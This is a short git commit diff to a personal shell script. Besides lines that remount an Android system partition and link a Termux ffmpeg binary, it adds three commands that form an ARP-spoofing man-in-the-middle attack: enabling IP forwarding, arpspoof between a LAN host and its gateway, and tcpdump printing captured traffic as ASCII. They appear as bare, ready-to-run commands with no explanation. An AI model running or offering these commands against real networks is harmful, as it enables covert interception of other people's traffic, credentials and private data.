This commit is contained in:
simono41 2017-09-11 23:13:20 +02:00
parent df28d50001
commit c67ed852ff

View file

@ -2,3 +2,9 @@ busybox mount -o rw,remount /system
mount -o rw,remount /system mount -o rw,remount /system
BEFEHL=ffmpeg BEFEHL=ffmpeg
ln -s /data/data/com.termux/files/usr/bin/$BEFEHL /system/xbin/ ln -s /data/data/com.termux/files/usr/bin/$BEFEHL /system/xbin/
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i enp30s0 -t 192.168.178.33 -r 192.168.178.1
tcpdump -i eth0 -A host 192.168.0.5